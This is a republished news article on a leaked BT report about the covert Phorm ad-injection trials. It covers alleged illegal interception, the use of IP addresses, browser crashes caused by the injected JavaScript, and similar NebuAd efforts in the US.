Wikileaks – Phorm Crashes Browsers, Allegedly Broke the Law 113 Million Times

We have been following the Phorm controversy for some time now and now some new developments have emerged.

Note: This is an article I wrote that was published elsewhere first. It has been republished here for archival purposes

These developments consist of a leaked internal report which suggests that Phorm broke the law 113 million times during the controversial trials.

Wikileaks has freshly leaked internal report which says some very interesting things. Here’s the Wikileaks summary of the report:

The internal British Telecom report shows that the carrier committed at least 18,875,324 allegedly illegal acts of interception and modification during its controversial covert “Phorm” trials.

The report also indicates that personal identifying IP addresses were likely used, despite BT previously assuring the public and ICO that no personally identifiable data was used. IP addresses are recognised by the Data Protection Act.

In addition to the 18 million regular advertising injections or hijackings, it appears charity advertisements were hijacked and replaced with Phorm advertisements.

The report concludes that the “opt-out” system would not work, since BT customers find themselves opted back in every time they changed computers or wiped their cookies

The report is currently making the rounds on various news sites including Open Rights Group which points to Alexander Hanff’s analysis. Hanff notes the following:

There were a number of things in the report which left me believing that BT had misled ICO (and the public) with regards the covert trials.

BT have repeatedly stated the trials involved no personally identifiable data and this is one of the points ICO touched on in their letter to one of the victims of the 2007 trials as reported on this web site last week.

However, and this will be obvious to the technically minded although I have not seen anyone mention it to date, if we return to the table on page 45 we have a row called “IP addresses seen through the Proxy Servers” for the same period as above but also no data for 24th September due to a technical fault. So it is evident that the PageSense servers (running multiple instances of SQUID proxy server) were in possession of customer IPs; and in fact due to the way PageSense worked, they needed to have these IPs in order to forward the web page back to the user once it had been grabbed by SQUID.

He then notes that there was a claim that the trials were trivial, but after a look on page 45, he notes that nearly 19 million tags were inserted into users web pages. He then does an analysis of British law with specific references to the following:

– Regulation of Investigatory Powers Act 2000
– Privacy and Electronic Communications (EC Directive) Regulations 2003
– Computer Misuse Act 1990
– Torts (Interference with Goods) Act 1977
– Copyright, Designs and Patents Act 1998 (see derivative works)
– Data Protection Act 1998 (IP addresses are legally defined as personally identifiable data)

He then tallies up the total number of “highly probable” law infractions and comes to a total of 113,252,124.

“still think that looks trivial?” asks Hanff, “And that is just in 8 days.”

Hanff isn’t the only one that took notice of these developments. Ryan Singel of threat level noted these developments as well and finds that the Phorm technology also causes web browser instability.

Those boxes inserted JavaScript code into every web page downloaded by the users. That script then reported back to Phorm the contents of the web page, which Phorm used to create ad profiles of a user. Additionally, Phorm purchased advertising space on prominent web sites, showing a default ad for a charity. But when a user who had previously looked at car sites visited one of those pages, he instead got an advertisement for car insurance.

The users were not informed they were being made guinea pigs for a new revenue system for BT and had no way to opt out of the system, according to the report. The JavaScript caused flickering problems for some users as the script reported back information about the content of the web page to a Phorm server. The script also crashed browsers that loaded a website that relied excessively on anchor tags. Additionally, the rogue JavaScript showed up unexpectedly in user’s posts to some web forums.

Despite these problems, the technical assessment concluded the test was successful and was largely went unnoticed by most users.

Think all of this is just an issue with British users and not U.S. users specifically? Think again. The report also notes an earlier report which points to a company called NebuAds attempting to do similar things in the US with US ISP Charter only to be asked to stopped by Massachusetts Democrat Edward Markey and Texas Republican Joe Barton saying it would be a violation of the Communications Act. Wired obtained a copy of the letter which can be read here (PDF) No word yet on what the next move would be by NebuAds or Charter.

It’s interesting to note that there seems to be a similar trend to what happened previously in another major incident in the past. First secrecy, then covert implementation (though, in this case, “trials”), discovery by advocates that laws are being broken, etc. may sound familiar to those who followed the Sony Rootkit fiasco. If one were to look at it from this angle, there may be a happy ending for consumers in the future. One can only hope the same will be said for those facing Javascript intercepting technology for the purpose of pushing ads.

Drew Wilson on Twitter: @icecube85 and Google+.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: